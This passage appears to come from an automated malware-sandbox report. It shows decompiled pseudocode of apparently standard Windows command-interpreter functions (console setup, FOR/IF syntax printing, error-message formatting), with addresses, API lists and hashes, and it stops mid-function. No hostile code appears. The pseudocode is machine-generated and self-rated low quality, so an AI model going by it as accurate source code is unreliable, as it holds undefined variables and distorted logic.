                                                    Download Yara Rule
                                                    C-Code - Quality: 21%
                                                    			E011E06C0(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t15;
				void* _t16;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t28;
				signed int _t29;
				void* _t30;
				void* _t32;

				_t4 =  *0x11fd0b4; // 0x1805bc26
				_t5 = _t4 ^ _t29;
				_v8 = _t5;
				__imp___get_osfhandle( *0x1203880, __ecx);
				_t6 = SetConsoleMode(_t5, 1);
				__imp___get_osfhandle(0x1203880);
				_t32 = _t30 + 8;
				_t7 = GetConsoleMode(_t6, 1);
				if(_t7 == 0) {
					L2:
					__imp___get_osfhandle(0x1203884);
					if(GetConsoleMode(_t7, 0) != 0) {
						_t20 =  *0x1203884;
						_t8 = _t20 & 0x00000017;
						if(_t8 != 7) {
							_t23 = _t20 & 0xffffffef | 0x00000007;
							 *0x1203884 = _t23;
							__imp___get_osfhandle(_t23);
							_t8 = SetConsoleMode(_t8, 0);
						}
						_push(_t27);
						_t28 =  *0x1203888;
						if(_t28 != 0) {
							 *0x12194b4(L"CMD.EXE");
							_t8 =  *_t28();
						}
						_pop(_t27);
					}
					return E011E6FD0(_t8, _t16, _v8 ^ _t29, _t25, _t26, _t27);
				}
				_t24 =  *0x11fd0e0; // 0x7
				_t25 =  *0x1203880;
				_t7 = _t24 & _t25;
				if(_t7 != _t24) {
					_t25 = _t25 | _t24;
					 *0x1203880 = _t25;
					__imp___get_osfhandle(_t25);
					_t32 = _t32 + 4;
					_t7 = SetConsoleMode(_t7, 1);
					if(_t7 != 0) {
						goto L2;
					}
					_t7 =  *0x11fd0e0; // 0x7
					if((_t7 & 0x00000004) != 0) {
						 *0x11fd0e0 = _t7 & 0xfffffffb;
						_t15 =  *0x1203880 & 0xfffffffb;
						 *0x1203880 = _t15;
						__imp___get_osfhandle(_t15);
						_t32 = _t32 + 4;
						_t7 = SetConsoleMode(_t15, 1);
					}
				}
				goto L2;
			}





















                                                    0x011e06c6
                                                    0x011e06cb
                                                    0x011e06cd
                                                    0x011e06d8
                                                    0x011e06e2
                                                    0x011e06ef
                                                    0x011e06f5
                                                    0x011e06f9
                                                    0x011e0701
                                                    0x011e0717
                                                    0x011e071e
                                                    0x011e0730
                                                    0x011e0732
                                                    0x011e073a
                                                    0x011e073f
                                                    0x011e0744
                                                    0x011e074a
                                                    0x011e0750
                                                    0x011e075a
                                                    0x011e075a
                                                    0x011e0760
                                                    0x011e0761
                                                    0x011e0769
                                                    0x011e0772
                                                    0x011e0778
                                                    0x011e0778
                                                    0x011e077a
                                                    0x011e077a
                                                    0x011e0788
                                                    0x011e0788
                                                    0x011e0703
                                                    0x011e070b
                                                    0x011e0711
                                                    0x011e0715
                                                    0x011e0789
                                                    0x011e078e
                                                    0x011e0794
                                                    0x011e079a
                                                    0x011e079e
                                                    0x011e07a6
                                                    0x00000000
                                                    0x00000000
                                                    0x011ecc03
                                                    0x011ecc0a
                                                    0x011ecc13
                                                    0x011ecc1d
                                                    0x011ecc23
                                                    0x011ecc28
                                                    0x011ecc2e
                                                    0x011ecc32
                                                    0x011ecc32
                                                    0x011ecc0a
                                                    0x00000000

                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011E06D8
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F38A5), ref: 011E06E2
                                                    • _get_osfhandle.MSVCRT ref: 011E06EF
                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E06F9
                                                    • _get_osfhandle.MSVCRT ref: 011E071E
                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E0728
                                                    • _get_osfhandle.MSVCRT ref: 011E0750
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E075A
                                                    • _get_osfhandle.MSVCRT ref: 011E0794
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E079E
                                                    • _get_osfhandle.MSVCRT ref: 011ECC28
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011ECC32
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ConsoleMode_get_osfhandle
                                                    • String ID: CMD.EXE
                                                    • API String ID: 1606018815-3025314500
                                                    • Opcode ID: 01a5888d23800d0a3d92f9b70e6f19f1b6809fadd3c3eda2c25a491e1cdc745d
                                                    • Instruction ID: b2df2b0f06f3245a785a2f867bdb3917657bd21561ff69f95b3df2b282e24d7a
                                                    • Opcode Fuzzy Hash: 01a5888d23800d0a3d92f9b70e6f19f1b6809fadd3c3eda2c25a491e1cdc745d
                                                    • Instruction Fuzzy Hash: 8031B1B0B40A04AFDF38DBA8FC1EB253AE4BB14719B08062DF512C2185DBB0D984CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D9835, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 300COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E011D9835(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* __ebp;
				intOrPtr _t76;
				intOrPtr _t87;
				intOrPtr _t90;
				signed int _t91;
				signed char _t103;
				signed int _t107;
				intOrPtr _t108;
				signed int _t125;
				signed int _t144;
				intOrPtr* _t179;
				void* _t182;

				_t153 = __edx;
				_t123 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t179 = __ecx;
				_t114 = 0;
				_t182 = __edx;
				_v8 = 0;
				_t76 =  *__ecx;
				if(_t76 > 0x37) {
					__eflags = _t76 - 0x38;
					if(__eflags == 0) {
						E011D9899(0, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						L78:
						_t125 =  *(_t179 + 0x3c);
						L79:
						E011D9835(_t125, _t182, _a4);
						L7:
						return 0;
					}
					if(__eflags <= 0) {
						L54:
						__imp__longjmp(0x120b8f8, 0xffffffff);
						L55:
						E011D9899(_t114, _a4, "(", _t114);
						_v8 = ")";
						L60:
						E011D9835( *((intOrPtr*)(_t179 + 0x38)), _t182, _a4);
						E011D9899(_t114, _a4, _v8, _t114);
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L7;
						}
						__eflags =  *_t179 - 0x3b;
						if( *_t179 == 0x3b) {
							goto L7;
						}
						goto L78;
					}
					__eflags = _t76 - 0x3a;
					if(_t76 <= 0x3a) {
						_v8 = L"== ";
						__eflags =  *0x1213cc9;
						if( *0x1213cc9 != 0) {
							_t87 =  *((intOrPtr*)(__ecx + 0x44));
							__eflags = _t87 - 1;
							if(_t87 != 1) {
								__eflags = _t87 - 2;
								if(_t87 != 2) {
									__eflags = _t87 - 3;
									if(_t87 != 3) {
										__eflags = _t87 - 4;
										if(_t87 != 4) {
											__eflags = _t87 - 5;
											if(_t87 != 5) {
												__eflags = _t87 - 6;
												if(_t87 == 6) {
													_v8 = L"GEQ ";
												}
											} else {
												_v8 = L"GTR ";
											}
										} else {
											_v8 = L"LEQ ";
										}
									} else {
										_v8 = L"LSS ";
									}
								} else {
									_v8 = L"NEQ ";
								}
							} else {
								_v8 = L"EQU ";
							}
						}
						E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)), 1);
						_t114 = 0;
						_push(0);
						_push(_v8);
						L4:
						E011D9899(_t114, _a4);
						if( *(_t179 + 0x3c) != _t114) {
							E011D9899(_t114, _a4,  *(_t179 + 0x3c), _t114);
						}
						E011D9CA6(_t179, _t182, _a4);
						goto L7;
					}
					__eflags = _t76 - 0x3b;
					if(_t76 == 0x3b) {
						L13:
						E011D9CA6(_t123, _t153, _a4);
						_t114 = 1;
						__eflags =  *_t179 - 0x2e;
						if( *_t179 < 0x2e) {
							goto L60;
						}
						__eflags =  *_t179 - 0x2f;
						if( *_t179 <= 0x2f) {
							_v8 = "&";
							goto L60;
						}
						__eflags =  *_t179 - 0x30;
						if( *_t179 == 0x30) {
							_v8 = L"||";
							goto L60;
						}
						__eflags =  *_t179 - 0x31;
						if( *_t179 == 0x31) {
							_v8 = L"&&";
							goto L60;
						}
						__eflags =  *_t179 - 0x32;
						if( *_t179 == 0x32) {
							_v8 = "|";
							goto L60;
						}
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L55;
						} else {
							__eflags =  *_t179 - 0x3b;
							if( *_t179 == 0x3b) {
								E011D9899(1, _a4, "@", 1);
								_v8 = " ";
							}
							goto L60;
						}
					}
					__eflags = _t76 - 0x3c;
					if(_t76 != 0x3c) {
						goto L54;
					}
					_t90 =  *0x1218510;
					__eflags = _t90 - 0x2396;
					if(_t90 != 0x2396) {
						__eflags = _t90 - 0x2395;
						if(_t90 != 0x2395) {
							__eflags = _t90 - 0x2390;
							if(_t90 != 0x2390) {
								goto L54;
							}
							_t91 = L"REM /?";
							L53:
							E011D9899(_t114, _a4, _t91, 1);
							goto L7;
						}
						_t91 = L"IF /?";
						goto L53;
					}
					_t91 = L"FOR /?";
					goto L53;
				}
				if(_t76 >= 0x34 || _t76 == 0) {
					L3:
					_push(1);
					_push( *((intOrPtr*)(_t179 + 0x38)));
					goto L4;
				} else {
					__eflags = _t76 - 0x2b;
					if(_t76 == 0x2b) {
						E011D9899(1, _a4, L"FOR", 1);
						__eflags =  *0x1213cc9;
						if( *0x1213cc9 == 0) {
							L41:
							E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 6, 1);
							E011D9899(1, _a4, "(", 1);
							E011D9899(1, _a4,  *(_t179 + 0x3c), 0);
							E011D9899(1, _a4, ")", 0);
							E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 0x2c, 1);
							_t125 =  *(_t179 + 0x40);
							goto L79;
						}
						_t103 =  *(__ecx + 0x48);
						__eflags = 1 & _t103;
						if((1 & _t103) == 0) {
							__eflags = _t103 & 0x00000002;
							if((_t103 & 0x00000002) == 0) {
								__eflags = _t103 & 0x00000008;
								if((_t103 & 0x00000008) == 0) {
									__eflags = _t103 & 0x00000004;
									if((_t103 & 0x00000004) == 0) {
										goto L41;
									}
									_push(1);
									_push(L"/R");
									L38:
									E011D9899(1, _a4);
									__eflags =  *(_t179 + 0x4c);
									if( *(_t179 + 0x4c) == 0) {
										goto L41;
									}
									_push(1);
									_push( *(_t179 + 0x4c));
									goto L40;
								}
								_push(1);
								_push(L"/F");
								goto L38;
							}
							_push(1);
							_push(L"/D");
							goto L40;
						} else {
							_push(1);
							_push(L"/L");
							L40:
							E011D9899(1, _a4);
							goto L41;
						}
					}
					__eflags = _t76 - 0x2c;
					if(_t76 == 0x2c) {
						E011D9899(1, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						_t107 =  *(__ecx + 0x3c);
						_t144 = 0;
						__eflags =  *_t107 - 0x38;
						if( *_t107 == 0x38) {
							_t108 =  *((intOrPtr*)(_t107 + 0x3c));
							__eflags =  *((intOrPtr*)(_t108 + 0x40)) - 2;
							_t107 =  *(__ecx + 0x3c);
							if( *((intOrPtr*)(_t108 + 0x40)) == 2) {
								_t144 = L"/I";
							}
						} else {
							asm("sbb ecx, ecx");
							_t144 =  !( ~( *((intOrPtr*)(_t107 + 0x40)) - 2)) & L"/I";
						}
						__eflags = _t144;
						if(_t144 != 0) {
							E011D9899(1, _a4, _t144, 1);
							_t107 =  *(_t179 + 0x3c);
						}
						E011D9835(_t107, _t182, _a4);
						E011D9835( *(_t179 + 0x40), _t182, _a4);
						__eflags =  *(_t179 + 0x48);
						if( *(_t179 + 0x48) == 0) {
							goto L7;
						} else {
							E011D9899(1, _a4,  *((intOrPtr*)(_t179 + 0x44)), 1);
							_t125 =  *(_t179 + 0x48);
							goto L79;
						}
					}
					__eflags = _t76 - 0x2d;
					if(__eflags == 0) {
						goto L3;
					}
					if(__eflags <= 0) {
						goto L54;
					}
					__eflags = _t76 - 0x33;
					if(_t76 > 0x33) {
						goto L54;
					}
					goto L13;
				}
			}

















                                                    0x011d9835
                                                    0x011d9835
                                                    0x011d983a
                                                    0x011d983b
                                                    0x011d983f
                                                    0x011d9841
                                                    0x011d9843
                                                    0x011d9845
                                                    0x011d9848
                                                    0x011d984d
                                                    0x011f0ed1
                                                    0x011f0ed4
                                                    0x011f1036
                                                    0x011f103b
                                                    0x011f103b
                                                    0x011f103e
                                                    0x011f1043
                                                    0x011d988e
                                                    0x011d9896
                                                    0x011d9896
                                                    0x011f0eda
                                                    0x011f0f32
                                                    0x011f0f39
                                                    0x011f0f3f
                                                    0x011f0f4a
                                                    0x011f0f4f
                                                    0x011f0f7a
                                                    0x011f0f82
                                                    0x011f0f90
                                                    0x011f0f95
                                                    0x011f0f98
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0f9e
                                                    0x011f0fa1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0fa7
                                                    0x011f0edc
                                                    0x011f0edf
                                                    0x011f0fae
                                                    0x011f0fb6
                                                    0x011f0fbd
                                                    0x011f0fbf
                                                    0x011f0fc2
                                                    0x011f0fc4
                                                    0x011f0fcf
                                                    0x011f0fd2
                                                    0x011f0fdd
                                                    0x011f0fe0
                                                    0x011f0feb
                                                    0x011f0fee
                                                    0x011f0ff9
                                                    0x011f0ffc
                                                    0x011f1007
                                                    0x011f100a
                                                    0x011f100c
                                                    0x011f100c
                                                    0x011f0ffe
                                                    0x011f0ffe
                                                    0x011f0ffe
                                                    0x011f0ff0
                                                    0x011f0ff0
                                                    0x011f0ff0
                                                    0x011f0fe2
                                                    0x011f0fe2
                                                    0x011f0fe2
                                                    0x011f0fd4
                                                    0x011f0fd4
                                                    0x011f0fd4
                                                    0x011f0fc6
                                                    0x011f0fc6
                                                    0x011f0fc6
                                                    0x011f0fc4
                                                    0x011f101c
                                                    0x011f1021
                                                    0x011f1023
                                                    0x011f1024
                                                    0x011d9865
                                                    0x011d986a
                                                    0x011d9872
                                                    0x011d987d
                                                    0x011d987d
                                                    0x011d9889
                                                    0x00000000
                                                    0x011d9889
                                                    0x011f0ee5
                                                    0x011f0ee8
                                                    0x011f0d18
                                                    0x011f0d1b
                                                    0x011f0d22
                                                    0x011f0d23
                                                    0x011f0d26
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0d2c
                                                    0x011f0d2f
                                                    0x011f0f73
                                                    0x00000000
                                                    0x011f0f73
                                                    0x011f0d35
                                                    0x011f0d38
                                                    0x011f0f6a
                                                    0x00000000
                                                    0x011f0f6a
                                                    0x011f0d3e
                                                    0x011f0d41
                                                    0x011f0f61
                                                    0x00000000
                                                    0x011f0f61
                                                    0x011f0d47
                                                    0x011f0d4a
                                                    0x011f0f58
                                                    0x00000000
                                                    0x011f0f58
                                                    0x011f0d50
                                                    0x011f0d53
                                                    0x00000000
                                                    0x011f0d59
                                                    0x011f0d59
                                                    0x011f0d5c
                                                    0x011f0d6d
                                                    0x011f0d72
                                                    0x011f0d72
                                                    0x00000000
                                                    0x011f0d5c
                                                    0x011f0d53
                                                    0x011f0eee
                                                    0x011f0ef1
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0ef3
                                                    0x011f0ef8
                                                    0x011f0efd
                                                    0x011f0f06
                                                    0x011f0f0b
                                                    0x011f0f14
                                                    0x011f0f19
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0f1b
                                                    0x011f0f20
                                                    0x011f0f28
                                                    0x00000000
                                                    0x011f0f28
                                                    0x011f0f0d
                                                    0x00000000
                                                    0x011f0f0d
                                                    0x011f0eff
                                                    0x00000000
                                                    0x011f0eff
                                                    0x011d9856
                                                    0x011d9860
                                                    0x011d9860
                                                    0x011d9862
                                                    0x00000000
                                                    0x011f0cf2
                                                    0x011f0cf2
                                                    0x011f0cf5
                                                    0x011f0e18
                                                    0x011f0e1d
                                                    0x011f0e24
                                                    0x011f0e75
                                                    0x011f0e82
                                                    0x011f0e92
                                                    0x011f0ea1
                                                    0x011f0eb2
                                                    0x011f0ec4
                                                    0x011f0ec9
                                                    0x00000000
                                                    0x011f0ec9
                                                    0x011f0e26
                                                    0x011f0e29
                                                    0x011f0e2b
                                                    0x011f0e35
                                                    0x011f0e37
                                                    0x011f0e41
                                                    0x011f0e43
                                                    0x011f0e4d
                                                    0x011f0e4f
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0e51
                                                    0x011f0e52
                                                    0x011f0e57
                                                    0x011f0e5c
                                                    0x011f0e61
                                                    0x011f0e65
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0e67
                                                    0x011f0e68
                                                    0x00000000
                                                    0x011f0e68
                                                    0x011f0e45
                                                    0x011f0e46
                                                    0x00000000
                                                    0x011f0e46
                                                    0x011f0e39
                                                    0x011f0e3a
                                                    0x00000000
                                                    0x011f0e2d
                                                    0x011f0e2d
                                                    0x011f0e2e
                                                    0x011f0e6b
                                                    0x011f0e70
                                                    0x00000000
                                                    0x011f0e70
                                                    0x011f0e2b
                                                    0x011f0cfb
                                                    0x011f0cfe
                                                    0x011f0d8a
                                                    0x011f0d8f
                                                    0x011f0d92
                                                    0x011f0d94
                                                    0x011f0d97
                                                    0x011f0dad
                                                    0x011f0db0
                                                    0x011f0db4
                                                    0x011f0db7
                                                    0x011f0db9
                                                    0x011f0db9
                                                    0x011f0d99
                                                    0x011f0da1
                                                    0x011f0da5
                                                    0x011f0da5
                                                    0x011f0dbe
                                                    0x011f0dc0
                                                    0x011f0dc9
                                                    0x011f0dce
                                                    0x011f0dce
                                                    0x011f0dd8
                                                    0x011f0de5
                                                    0x011f0dea
                                                    0x011f0dee
                                                    0x00000000
                                                    0x011f0df4
                                                    0x011f0dfd
                                                    0x011f0e02
                                                    0x00000000
                                                    0x011f0e02
                                                    0x011f0dee
                                                    0x011f0d00
                                                    0x011f0d03
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0d09
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0d0f
                                                    0x011f0d12
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0d12

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                    • API String ID: 0-366822981
                                                    • Opcode ID: d26f97cd77313ef046d4caf09eb9d126965ad5cbf551f48b37454695618812c5
                                                    • Instruction ID: 8f9ec51c66f5d6d6b25f9777ae3baf61cdc8b94a15efac45ad00c52a029cece2
                                                    • Opcode Fuzzy Hash: d26f97cd77313ef046d4caf09eb9d126965ad5cbf551f48b37454695618812c5
                                                    • Instruction Fuzzy Hash: ADA1E1B070020EFBDF2CDE59C98596E7B27FB88698B10811DF6069B252C7719D91CB83
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DC6F4, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 147windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 41%
                                                    			E011DC6F4(long __ecx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				char _v40;
				short _v104;
				void* _v108;
				long _v112;
				char* _v116;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				signed int _t26;
				char* _t31;
				void* _t37;
				char* _t45;
				intOrPtr _t48;
				WCHAR* _t55;
				void* _t56;
				signed int _t57;
				signed int _t59;
				long _t60;
				void* _t61;
				int _t62;
				signed int _t63;

				_t22 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t22 ^ _t63;
				_t47 = _a8;
				_t60 = __ecx;
				_v108 = _a8;
				_t62 = 0;
				_v112 = __ecx;
				if(__ecx == 0x13d || FormatMessageW(0x1a00, 0, __ecx, 0, 0x120b980, 0x2000, 0) == 0) {
					__imp___ultoa(_t60,  &_v40, 0x10);
					_t26 = E011E0638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(_t62,  ~( ~_t26),  &_v40, 0xffffffff,  &_v104, 0x20);
					_v120 =  &_v104;
					_t31 = L"Application";
					if(_t60 < 0x2328) {
						_t31 = L"System";
					}
					_v116 = _t31;
					_push( &_v120);
					_push(0x2000);
					_push(0x120b980);
					_push(_t62);
					_push(0x13d);
					_push(_t62);
					_push(0x3000);
					goto L6;
				} else {
					_t55 = 0x120b980;
					_t48 = 0x25;
					while(1) {
						_t58 = _t48;
						_t37 = E011DD7D4(_t55, _t48);
						_t56 = _t37;
						if(_t56 == 0) {
							break;
						}
						_t55 = _t56 + 2;
						_t59 =  *_t55 & 0x0000ffff;
						if(_t59 - 0x31 > 8) {
							if(_t59 == _t48) {
								_t55 =  &(_t55[1]);
							}
						} else {
							_t62 = _t62 + 1;
						}
					}
					_t47 = _v108;
					if(_t62 > _a4) {
						_t47 = HeapAlloc(GetProcessHeap(), 0, _t62 << 2);
						if(_t47 == 0) {
							L8:
							return E011E6FD0(_t34, _t47, _v8 ^ _t63, _t58, _t60, _t62);
						}
						_t57 = 0;
						if(_t62 == 0) {
							L21:
							_t62 = FormatMessageW(0x3800, 0, _t60, 0, 0x120b980, 0x2000, _t47);
							RtlFreeHeap(GetProcessHeap(), 0, _t47);
							L7:
							_t34 = _t62;
							goto L8;
						}
						_t61 = _v108;
						_t58 = _a4;
						do {
							if(_t57 >= _t58) {
								_t45 = " ";
							} else {
								 *_t61 =  *_t61 + 4;
								_t45 =  *( *_t61 - 4);
							}
							 *(_t47 + _t57 * 4) = _t45;
							_t57 = _t57 + 1;
						} while (_t57 < _t62);
						_t60 = _v112;
						goto L21;
					}
					_push(_t47);
					_push(0x2000);
					_push(0x120b980);
					_push(_t37);
					_push(_t60);
					_push(_t37);
					_push(0x1800);
					L6:
					_t62 = FormatMessageW();
					goto L7;
				}
			}



























                                                    0x011dc6fc
                                                    0x011dc703
                                                    0x011dc707
                                                    0x011dc70c
                                                    0x011dc70e
                                                    0x011dc711
                                                    0x011dc713
                                                    0x011dc71c
                                                    0x011eaf0e
                                                    0x011eaf1f
                                                    0x011eaf2e
                                                    0x011eaf38
                                                    0x011eaf41
                                                    0x011eaf44
                                                    0x011eaf4f
                                                    0x011eaf51
                                                    0x011eaf51
                                                    0x011eaf56
                                                    0x011eaf5c
                                                    0x011eaf5d
                                                    0x011eaf62
                                                    0x011eaf67
                                                    0x011eaf68
                                                    0x011eaf6d
                                                    0x011eaf6e
                                                    0x00000000
                                                    0x011dc743
                                                    0x011dc745
                                                    0x011dc74a
                                                    0x011dc74b
                                                    0x011dc74b
                                                    0x011dc74d
                                                    0x011dc752
                                                    0x011dc756
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc794
                                                    0x011dc797
                                                    0x011dc7a1
                                                    0x011eae7e
                                                    0x011eae84
                                                    0x011eae84
                                                    0x011dc7a7
                                                    0x011dc7a7
                                                    0x011dc7a7
                                                    0x011dc7a1
                                                    0x011dc758
                                                    0x011dc75e
                                                    0x011eaea1
                                                    0x011eaea5
                                                    0x011dc781
                                                    0x011dc791
                                                    0x011dc791
                                                    0x011eaeab
                                                    0x011eaeaf
                                                    0x011eaed5
                                                    0x011eaef3
                                                    0x011eaefc
                                                    0x011dc77f
                                                    0x011dc77f
                                                    0x00000000
                                                    0x011dc77f
                                                    0x011eaeb1
                                                    0x011eaeb4
                                                    0x011eaeb7
                                                    0x011eaeb9
                                                    0x011eaec5
                                                    0x011eaebb
                                                    0x011eaebb
                                                    0x011eaec0
                                                    0x011eaec0
                                                    0x011eaeca
                                                    0x011eaecd
                                                    0x011eaece
                                                    0x011eaed2
                                                    0x00000000
                                                    0x011eaed2
                                                    0x011dc764
                                                    0x011dc765
                                                    0x011dc76a
                                                    0x011dc76f
                                                    0x011dc770
                                                    0x011dc771
                                                    0x011dc772
                                                    0x011dc777
                                                    0x011dc77d
                                                    0x00000000
                                                    0x011dc77d

                                                    APIs
                                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,?,00000000,0120B980,00002000,00000000,00000000,?,00000000), ref: 011DC735
                                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,?,00000000,0120B980,00002000,?), ref: 011DC777
                                                    • _ultoa.MSVCRT ref: 011EAF0E
                                                    • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011EAF17
                                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,000000FF,?,00000020), ref: 011EAF38
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                    • String ID: Application$System
                                                    • API String ID: 3538039442-3455788185
                                                    • Opcode ID: e2487abe77ab89d349b284bd426415fbd0543afd3c5013dd0217b18ad43fc1a1
                                                    • Instruction ID: 05dde94352ced63d082aad38fd2d9c5ee93768cc0259d28a3f910b6ea27cf815
                                                    • Opcode Fuzzy Hash: e2487abe77ab89d349b284bd426415fbd0543afd3c5013dd0217b18ad43fc1a1
                                                    • Instruction Fuzzy Hash: FF41E771B007196BDF289BA4DC5DFAEBBA8EB55711F110119F606EB1C0DB709D40CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E04A0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 55%
                                                    			E011E04A0(signed int __eax, void* __ebx, void* __edx, void* __edi) {
				signed int _v4;
				WCHAR* _v8;
				long* _v12;
				long _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v544;
				WCHAR* _v548;
				WCHAR* _v552;
				WCHAR* __esi;
				signed int _t106;
				short _t107;
				void* _t112;
				signed int _t115;
				void* _t117;
				WCHAR** _t119;
				short _t120;
				signed int _t124;
				signed short* _t125;
				WCHAR* _t129;

				_t117 = __ebx;
				_t106 = __eax;
				if( *0x120fa90 != 0x4000) {
					_t107 =  *0x120faa0;
					__eflags = _t107 - 0x28;
					if(_t107 != 0x28) {
						__eflags = _t107 - 0x40;
						if(_t107 == 0x40) {
							goto L140;
						} else {
							goto L150;
						}
					} else {
						L140:
						_t119 = 0x50;
						_t129 = E011E00B0(0x50);
						__eflags = _t129;
						if(_t129 == 0) {
							E011F9287(0x50);
							__imp__longjmp(0x120b8b8, 1);
							asm("int3");
							_t106 =  *0x50 & 0x0000ffff;
							_t124 = _t106;
							__eflags = _t106;
							if(_t106 != 0) {
								_t106 = 0;
								__eflags = 0;
								do {
									_t125 = _t119;
									_t119 = _t119 + _t129;
									__eflags =  *_t119;
								} while ( *_t119 != 0);
								_t124 =  *_t125 & 0x0000ffff;
							}
							__eflags = _t124 - 0x3a;
							if(_t124 != 0x3a) {
								 *0x11fd55c = 3;
							}
							return _t106;
						} else {
							__eflags =  *0x120faa0 - 0x28;
							if( *0x120faa0 != 0x28) {
								 *_t129 = 0x3b;
								_t120 = 0;
							} else {
								 *_t129 = 0x33;
								do {
									_t115 = E011DF030(0x10);
									__eflags =  *0x120faa0 - 0xa;
								} while ( *0x120faa0 == 0xa);
								__eflags = 0;
								E011DF300(_t115, 0, 0, 0);
								_t120 = 0x33;
							}
							_t129[0x1c] = E011DDC74(_t117, _t120);
							__eflags =  *_t129 - 0x3b;
							if( *_t129 == 0x3b) {
								L147:
								return _t129;
							} else {
								_t112 = E011DF030(0x10);
								__eflags = _t112 - 0x29;
								if(_t112 != 0x29) {
									L150:
									E011F82EB(0x10);
									__eflags = 0;
									return 0;
								} else {
									goto L147;
								}
							}
						}
					}
				} else {
					__imp___wcsicmp(L"FOR", 0x120faa0);
					__esp = __esp + 8;
					__eflags = __eax;
					if(__eax == 0) {
						L152:
						_pop(__esi);
						__edi = 0;
						__imp___wcsicmp(L"FOR/?", __edi, __esi);
						_pop(__ecx);
						__ecx = 0x120faa0;
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = 0;
							__edi = 0;
							 *0x120faa6 = __ax;
							__edi = 1;
						}
						__ecx = 0x2b;
						 *0x120fa8c = 0x1e;
						__esi = E011DE9A0(__ecx, __eflags);
						__eax = 0x2f;
						__eflags = __edi;
						if(__edi != 0) {
							 *0x120faa0 = __ax;
							__eax = 0x3f;
							 *0x120faa2 = __ax;
							__eax = 0;
							 *0x120faa4 = __ax;
						} else {
							__ecx = 0;
							__eflags = 0;
							__eax = E011DF030(0);
						}
						__edx = 0x2b;
						__eax = E011DDCE1(__ebx, __edx, __edi);
						__eflags = __al;
						if(__al != 0) {
							__esi[0x1c] = __esi[0x1c] & 0x00000000;
							 *__esi = 0x3c;
						} else {
							__esi[0x24] = __esi[0x24] & 0x00000000;
